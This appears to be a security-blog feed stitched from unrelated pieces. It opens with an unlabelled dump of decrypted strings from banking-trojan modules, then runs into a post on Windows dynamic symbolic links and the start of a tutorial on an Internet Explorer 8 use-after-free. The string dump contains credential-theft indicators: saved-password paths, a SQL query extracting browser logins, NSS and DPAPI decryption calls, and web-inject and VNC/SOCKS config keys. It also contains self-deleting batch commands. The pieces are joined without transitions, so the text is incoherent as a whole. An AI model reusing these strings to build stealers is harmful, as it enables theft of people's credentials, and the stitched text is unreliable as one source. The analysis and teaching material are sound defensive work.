main
%userprofile%\AppData\Local\Mozilla\Firefox\Profiles
.avi
https://
Video: sec=%u, fps=%u, q=%u
Local\
%userprofile%\appdata\local\microsoft\edge\user data\default\cache
MiniDumpWriteDump
cache2\entries\*.*
%PROGRAMFILES%\Mozilla Firefox
%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*
Software\Classes\CLSID\%s\InProcServer32
open
http://
file://
DBGHELP.DLL
%temp%\rm3.dmp
%u, 0x%x, "%S"
"%S", 0x%p, 0x%x
%APPDATA%
SOFTWARE\Microsoft\Windows NT\CurrentVersion
InstallDate

rt.dll – bss decrypted

Windows Security
%s%02u:%02u:%02u 
:%u
attrib -h -r -s %%1
del %%1
if exist %%1 goto %u
del %%0
Low\
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
*.*
.bin
open
%02u-%02u-%02u %02u:%02u:%02u
*.dll
%systemroot%\system32\c_1252.NLS
rundll32 "%s",%S %s
"%s"
cmd /C regsvr32 "%s"
Mb=Lk
Author
n;
QkkXa
M<q

netwrk.dll – bss decrypted

&WP
POST
Host
%04x%04x
GET
Windows Security
Content-Type: multipart/form-data; boundary=%s
Content-Type: application/octet-stream
--%s
--%s--
%c%02X
https://
http://
%08x%08x%08x%08x
form
%s=%s&
/images/
.bmp
file://
type=%u&soft=%u&version=%u&user=%08x%08x%08x%08x&group=%u&id=%08x&arc=%u&crc=%08x&size=%u&uptime=%u
index.html
Content-Disposition: form-data; name="%s"
; filename="%s"
&os=%u.%u_%u_%u_x%u
&ip=%s
Mozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko
; Win64; x64
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%08x
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
F%D,3
overridelink
invalidcert
9*.onion
&sysid=%08x%08x%08x%08x

browser.dll – bss decrypted

%c%02X
.php
Windows Security
1.3.6.1.5.5.7.3.2
1.3.6.1.5.5.7.3.1
2.5.29.15
2.5.29.37
2.5.29.1
2.5.29.35
2.5.29.14
2.5.29.10
2.5.29.19
1.3.6.1.5.5.7.1.1
2.5.29.32
1.3.6.1.5.5.7.1.11
1.3.6.1.5.5.7
1.3.6.1.5.5.7.1
2.5.29.31
1.2.840.113549.1.1.11
1.2.840.113549.1.1.5
WS2_32.dll
iexplore.hlp
ConnectEx
Local\
WSOCK32.DLL
WININET.DLL
CRYPT32.DLL
socket
connect
closesocket
getpeername
WSAStartup
WSACleanup
WSAIoctl
User-Agent
Content-Type
Content-Length
Connection
Content-Security-Policy
Content-Security-Policy-Report-Only
X-Frame-Options
Access-Control-Allow-Origin
chunked
WebSocket
Transfer-Encoding
Content-Encoding
Accept-Encoding
Accept-Language
Cookie
identity
gzip, deflate
gzip
Host
://
HTTP/1.1 404 Not Found
Content-Length: 0
://
HTTP/1.1 503 Service Unavailable
Content-Length: 0
http://
https://
Referer
Upgrade
Cache-Control
Last-Modified
Etag
no-cache, no-store, must-revalidate
ocsp
TEXT HTML JSON JAVASCRIPT
SECUR32.DLL
SECURITY.DLL
InitSecurityInterfaceW
BUNNY
SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
SendTrustedIssuerList
@ID@
URL=
Main
@RANDSTR@
Blocked
@GROUP@
BLOCKCFG=
LOADCFG=
DELCFG=
VIDEO=
VNC=
SOCKS=
CFGON=
CFGOFF=
ENCRYPT=
http
@%s@
http
grabs=
POST
PUT
GET
HEAD
OPTIONS
URL: %s
REF: %s
LANG: %s
AGENT: %s
COOKIE: %s
POST: 
USER: %s
USERID: %s
@*@
***
IE:
:Microsoft Unified Security Protocol Provider
FF:
CR:
ED:
iexplore
firefox
chrome
edge
InitRecv %u, %s%s
CompleteRecv %u, %s%s
LoadUrl %u, %s
NEWGRAB
CertGetCertificateChain
CertVerifyCertificateChainPolicy
NSS_Init
NSS_Shutdown
nss3.dll
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
hostname
vaultcli
%PROGRAMFILES%\Mozilla Thunderbird
encryptedUsername
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
encryptedPassword
logins.json
%systemroot%\syswow64\svchost.exe
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
FindCloseUrlCache
VaultEnumerateItems
type=%s, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
VaultEnumerateVaults
VaultOpenVault
VaultCloseVault
VaultFree
VaultGetItem
c:\test\sqlite3.dll
SELECT origin_url, username_value, password_value FROM logins
encrypted_key":"
default\login data
BCryptSetProperty
%userprofile%\appdata\local\google\chrome\user data
local state
DPAPI
v10
BCryptDecrypt
AES
Microsoft Primitive Provider
BCryptDestroyKey
BCryptCloseAlgorithmProvider
ChainingModeGCM
BCryptOpenAlgorithmProvider
BCryptGenerateSymmetricKey
BCRYPT
%userprofile%\appData\local\microsoft\edge\user data

Dynamic Symbolic Links

30 April 2021 at 15:00

While teaching a Windows Internals class recently, I came across a situation which looked like a bug to me, but turned out to be something I didn’t know about – dynamic symbolic links.

Symbolic links are Windows kernel objects that point to another object. The weird situation in question was when running WinObj from Sysinternals and navigating to the KenrelObjects object manager directory.

WinObj from Sysinternals

You’ll notice some symbolic link objects that look weird: MemoryErrors, PhysicalMemoryChange, HighMemoryCondition, LowMemoryCondition and a few others. The weird thing that is fairly obvious is that these symbolic link objects have empty targets. Double-clicking any one of them confirms no target, and also shows a curious zero handles, as well as quota change of zero:

Symbolic link properties

To add to the confusion, searching for any of them with Process Explorer yields something like this:

It seems these objects are events, and not symbolic links!

My first instinct was that there is a bug in WinObj (I rewrote it recently for Sysinternals, so was certain I introduced a bug). I ran an old WinObj version, but the result was the same. I tried other tools with similar functionality, and still got the same results. Maybe a bug in Process Explorer? Let’s see in the kernel debugger:

lkd> !object 0xFFFF988110EC0C20
Object: ffff988110ec0c20  Type: (ffff988110efb400) Event
    ObjectHeader: ffff988110ec0bf0 (new version)
    HandleCount: 4  PointerCount: 117418
    Directory Object: ffff828b10689530  Name: HighCommitCondition

Definitely an event and not a symbolic link. What’s going on? I debugged it in WinObj, and indeed the reported object type is a symbolic link. Maybe it’s a bug in the NtQueryDirectoryObject used to query a directory object for an object.

I asked Mark Russinovich, could there be a bug in Windows? Mark remembered that this is not a bug, but a feature of symbolic links, where objects can be created/resolved dynamically when accessing the symbolic link. Let’s see if we can see something in the debugger:

lkd> !object \kernelobjects\highmemorycondition
Object: ffff828b10659510  Type: (ffff988110e9ba60) SymbolicLink
    ObjectHeader: ffff828b106594e0 (new version)
    HandleCount: 0  PointerCount: 1
    Directory Object: ffff828b10656ce0  Name: HighMemoryCondition
    Flags: 0x000010 ( Local )
    Target String is '*** target string unavailable ***'

Clearly, there is target, but notice the flags value 0x10. This is the flag indicating the symbolic link is a dynamic one. To get further information, we need to look at the object with a “symbolic link lenses” by using the data structure the kernel uses to represent symbolic links:

lkd> dt nt!_OBJECT_SYMBOLIC_LINK ffff828b10659510

   +0x000 CreationTime     : _LARGE_INTEGER 0x01d73d87`21bd21e5
   +0x008 LinkTarget       : _UNICODE_STRING "--- memory read error at address 0x00000000`00000005 ---"
   +0x008 Callback         : 0xfffff802`08512250     long  nt!MiResolveMemoryEvent+0

   +0x010 CallbackContext  : 0x00000000`00000005 Void
   +0x018 DosDeviceDriveIndex : 0
   +0x01c Flags            : 0x10
   +0x020 AccessMask       : 0x24

The Callback member shows the function that is being called (MiResolveMemoryEvent) that “resolves” the symbolic link to the relevant event. There are currently 11 such events, their names visible with the following:

lkd> dx (nt!_UNICODE_STRING*)&nt!MiMemoryEventNames,11
(nt!_UNICODE_STRING*)&nt!MiMemoryEventNames,11                 : 0xfffff80207e02e90 [Type: _UNICODE_STRING *]
    [0]              : "\KernelObjects\LowPagedPoolCondition" [Type: _UNICODE_STRING]
    [1]              : "\KernelObjects\HighPagedPoolCondition" [Type: _UNICODE_STRING]
    [2]              : "\KernelObjects\LowNonPagedPoolCondition" [Type: _UNICODE_STRING]
    [3]              : "\KernelObjects\HighNonPagedPoolCondition" [Type: _UNICODE_STRING]
    [4]              : "\KernelObjects\LowMemoryCondition" [Type: _UNICODE_STRING]
    [5]              : "\KernelObjects\HighMemoryCondition" [Type: _UNICODE_STRING]
    [6]              : "\KernelObjects\LowCommitCondition" [Type: _UNICODE_STRING]
    [7]              : "\KernelObjects\HighCommitCondition" [Type: _UNICODE_STRING]
    [8]              : "\KernelObjects\MaximumCommitCondition" [Type: _UNICODE_STRING]
    [9]              : "\KernelObjects\MemoryErrors" [Type: _UNICODE_STRING]
    [10]             : "\KernelObjects\PhysicalMemoryChange" [Type: _UNICODE_STRING]

Creating dynamic symbolic links is only possible from kernel mode, of course, and is undocumented anyway.

At least the conundrum is solved.

image

zodiacon

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
  public:

    // This is our user defined constructor
    classOne()
    {
      cout << "Hello from the classOne constructor" << endl;
    }

    // This is our user defined destructor
    ~classOne()
    {
      cout << "Hello from the classOne destructor!" << endl;
    }

  public:
    virtual void sharedFunction(){};        // Prototype a virtual function
    virtual void sharedFunction1(){};       // Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
  public:

    // This is our user defined constructor
    classTwo()
    {
      cout << "Hello from the classTwo constructor!" << endl;
    };

    // This is our user defined destructor
    ~classTwo()
    {
      cout << "Hello from the classTwo destructor!" << endl;
    };

  public:
    void sharedFunction()               
    {
      cout << "Hello from the classTwo sharedFunction()!" << endl;    // Create A DIFFERENT function definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classTwo sharedFunction1()!" << endl;   // Create A DIFFERENT function definition of sharedFunction1()
    };
};

// This is another derived/sub class
class classThree : public classOne
{
  public:

    // This is our user defined constructor
    classThree()
    {
      cout << "Hello from the classThree constructor" << endl;
    };

    // This is our user defined destructor
    ~classThree()
    {
      cout << "Hello from the classThree destructor!" << endl;
    };
  
  public:
    void sharedFunction()
    {
      cout << "Hello from the classThree sharedFunction()!" << endl;  // Create A DIFFERENT definition of sharedFunction()
    };

    void sharedFunction1()
    {
      cout << "Hello from the classThree sharedFunction1()!" << endl;   // Create A DIFFERENT definition of sharedFunction1()
    };
};

// Main function
int main()
{
  // Create an instance of the base/main class and set it to one of the derivative classes
  // Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
  // The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  // Invoke the virtual functions
  c1->sharedFunction();
  c1_2->sharedFunction();
  c1->sharedFunction1();
  c1_2->sharedFunction1();

  // Destructors are called when the object is explicitly destroyed with delete
  delete c1;
  delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
  int var1;
  int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
  classOne* c1 = new classTwo;
  classOne* c1_2 = new classThree;

  c1->sharedFunction();
  c1_2->sharedFunction();

  delete c1;
  delete c1_2;

  // Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
  c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

